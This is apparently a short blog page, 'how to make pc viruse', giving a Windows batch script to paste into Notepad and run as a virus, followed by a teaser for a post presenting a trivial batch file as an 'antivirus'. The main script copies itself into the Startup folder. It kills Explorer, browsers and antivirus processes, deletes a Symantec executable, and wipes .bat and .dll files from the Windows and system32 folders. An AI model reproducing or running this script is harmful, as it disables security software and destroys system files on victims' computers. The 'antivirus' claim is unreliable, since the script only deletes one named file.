how to make pc viruse You might be scared of viruses in your computer or laptop. They directly affect the working of the computer systems. You may want to create your own virus too. This guide will show you how you can create a simple virus. Open the notepad file and paste the following code: @echo off copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" copy "virus.bat" "C:\" copy "virus.bat" "%userprofile%\My Documents" tskill explorer tskill ccapp tskill yahoomessenger tskill firefox tskill chrome rem made with Batch Virus Maker V.2 tskill iexplorer time 12:00 rem made with Batch Virus Maker V.2 del C:\Program Files\Common Files\Symantec Shared\ccapp.exe cd C:\WINDOWS if exist "*.bat" del "*.bat" cd C:\WINDOWS\system32 rem made with Batch Virus Maker V.2 if exist "*.dll" del "*.dll" tskill McAfee Sec...
Popular posts from this blog
how to make a antiviruse Step 1 to Create you OWN Antivirus using NotePad Open a Notepad and copy the code below. @echo off title Antivirus echo Antivirus echo created by YOUR NAME :start IF EXIST virus.bat goto infected IF NOT EXIST virus.bat goto clean cd C:Windowssystem32 :infected echo WARNING VIRUS DETECTED ! del virus.bat pause goto start :clean echo System secure! pause exit You can change the text in RED , with your name. The text in GREEN can be changed to show a different “Alert Message” which will be displayed if any virus is found in the computer you are using this program. ALSO READ : How to track Stolen Laptop, Smartphone, Unknown Mobile Number exactly on MAP… Step 2 to Create your Own Antivirus Select : File -> Save as Enter the Name as : Antivirus.bat Select File type as : All files. Now, run the Saved File, your Antivirus will start scanning. You can save the file name as your wish. But, ...


Comments
Post a Comment